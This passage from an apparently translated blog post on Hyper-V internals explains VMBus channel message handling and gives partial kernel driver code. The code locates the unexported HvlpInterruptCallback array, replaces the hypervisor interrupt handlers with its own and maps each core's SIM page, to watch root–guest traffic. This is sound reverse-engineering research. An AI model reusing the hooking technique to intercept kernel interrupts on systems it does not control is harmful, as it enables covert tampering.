<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbusr!ChReceiveChannelMessage handles such messages in root OS handles and analyzes the contents of the 4th slot SIM and determines code of vmbus messages. If it is 0 (CHANNELMSG_INVALID) or greater than 0x12, then the function returns an error code 0xC000000D (STATUS_INVALID_PARAMETER). Otherwise, the function processes the transmitted guest or root OS communication. For example, when the component Guest Services is enabled root OS sends a message CHANNELMSG_OFFERCHANNEL to the Guest OS, in response to the guest OS sends CHANNELMSG_GPADL_HEADER, then the root OS sends CHANNELMSG_GPADL_CREATED, gets back a message CHANNELMSG_OPENCHANNEL and finally sends a message CHANNELMSG_OPENCHANNEL_RESULT to the guest OS with the result code of the operation to create a channel. It is worth noting that prior to the treatment of each valid message function ChReceiveChannelMessage checks sent message (ChpValidateMessage), in particular on the subject of who is the sender (root-OS or guest OS) and for the minimum size of the message body.</span></div>
<br /><br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Let's see what the messages are exchanged between root OS and the guest OS. To do this, write a driver that replaces the address of an array of handlers HvlpInterruptCallback in the root operating system on their own handlers.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The driver is written in Visual Studio 2013. It must be loaded into the root OS, for example, by OSRLoader. To send IOCTL-code it uses a simple program SendIOCTL.exe. After sending IOCTL-code INTERRUPT_CODE the driver starts to perform and processing the data sent by the hypervisor to slot SIM0. Unfortunately the variable HvlpInterruptCallback, which contains the address of an array of pointers for the message handlers, is not exported by windows kernel, so it is necessary to analyze the code of the detection exported by the kernel function HvlRegisterInterruptCallback. It does contain the necessary address of the array. Also, unfortunately, it will not simply work to call HvlRegisterInterruptCallback to register your message handler, as in the beginning of the function it goes to check the variable values of HvlpFlags. If the variable is equal to 1 (as it is the assigned value in the initial stages of loading the kernel), the function stops the execution and returns an error code 0xC00000BB (STATUS_NOT_SUPPORTED), respectively, to register the handler correctly, you will need to replace the handler with your own version of the HvlpInterruptCallback function. The Hyperv4 driver required activities are performed by RegisterInterrupt.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Function RegisterInterrupt driver hyperv4 performs.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">int</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> RegisterInterrupt()</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">{</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #2b91af; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">UNICODE_STRING</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> uniName;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #2b91af; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PVOID</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> pvHvlRegisterAddress = </span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">NULL</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #2b91af; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PHYSICAL_ADDRESS</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> pAdr = {0};</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #2b91af; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ULONG</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> i,ProcessorCount;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: green; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">//</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: green; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">We get the number of active processor cores</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ProcessorCount = KeQueryActiveProcessorCount(</span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">NULL</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">); </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: green; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">//</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: green; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">search for addresses of the exported function HvlRegisterInterruptCallback</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DbgLog</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(</span><span style="background-color: white; color: #a31515; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">"Active processor count"</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">,ProcessorCount);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">RtlInitUnicodeString(&uniName, L</span><span style="background-color: white; color: #a31515; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">"HvlRegisterInterruptCallback"</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">pvHvlRegisterAddress = MmGetSystemRoutineAddress(&uniName);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">if</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> (pvHvlRegisterAddress == </span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">NULL</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">){</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DbgPrintString</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(</span><span style="background-color: white; color: #a31515; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">"Cannot find HvlRegisterInterruptCallback!"</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">return</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 0;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">}</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DbgLog16</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(</span><span style="background-color: white; color: #a31515; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">"HvlRegisterInterruptCallback address "</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">,pvHvlRegisterAddress);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: green; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">// </span><span style="background-color: transparent; color: green; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">search for addresses Variable HvlpInterruptCallback</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">FindHvlpInterruptCallback((</span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">unsigned</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">char</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> *)pvHvlRegisterAddress);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: green; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">//</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: green; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">replacement of original manufacture handler to our handler</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ArchmHvlRegisterInterruptCallback((</span><span style="background-color: white; color: #2b91af; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">uintptr_t</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)&ArchmWinHvOnInterrupt, (</span><span style="background-color: white; color: #2b91af; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">uintptr_t</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)pvHvlpInterruptCallbackOrig, </span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WIN_HV_ON_INTERRUPT_INDEX</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ArchmHvlRegisterInterruptCallback((</span><span style="background-color: white; color: #2b91af; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">uintptr_t</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)&ArchXPartEnlightenedIsr, (</span><span style="background-color: white; color: #2b91af; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">uintptr_t</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)pvHvlpInterruptCallbackOrig, </span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">XPART_ENLIGHTENED_ISR0_INDEX</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ArchmHvlRegisterInterruptCallback((</span><span style="background-color: white; color: #2b91af; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">uintptr_t</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)&ArchXPartEnlightenedIsr, (</span><span style="background-color: white; color: #2b91af; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">uintptr_t</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)pvHvlpInterruptCallbackOrig, </span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">XPART_ENLIGHTENED_ISR1_INDEX</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ArchmHvlRegisterInterruptCallback((</span><span style="background-color: white; color: #2b91af; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">uintptr_t</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)&ArchXPartEnlightenedIsr, (</span><span style="background-color: white; color: #2b91af; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">uintptr_t</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)pvHvlpInterruptCallbackOrig, </span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">XPART_ENLIGHTENED_ISR2_INDEX</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ArchmHvlRegisterInterruptCallback((</span><span style="background-color: white; color: #2b91af; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">uintptr_t</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)&ArchXPartEnlightenedIsr, (</span><span style="background-color: white; color: #2b91af; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">uintptr_t</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)pvHvlpInterruptCallbackOrig, </span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">XPART_ENLIGHTENED_ISR3_INDEX</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: green; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">//because SIMP value for all processor cores are different, you must obtain the addresses of all SIM,</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: green; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">//make it possible to access the contents of the page using MmMapIoSpace.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: green; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">//and save the received virtual address of each page in the array for later</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">for</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> (i = 0; i < ProcessorCount; i++){</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">KeSetSystemAffinityThreadEx(1i64 << i);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DbgLog</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(</span><span style="background-color: white; color: #a31515; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">"Current processor number"</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, KeGetCurrentProcessorNumberEx(</span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">NULL</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">));</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">pAdr.QuadPart = ArchReadMsr(</span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_X64_MSR_SIMP</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">) & 0xFFFFFFFFFFFFF000;</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">pvSIMP[i] = MmMapIoSpace(pAdr, </span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">PAGE_SIZE</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, MmCached);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: blue; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">if</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> (pvSIMP[i] == </span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">NULL</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">){</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
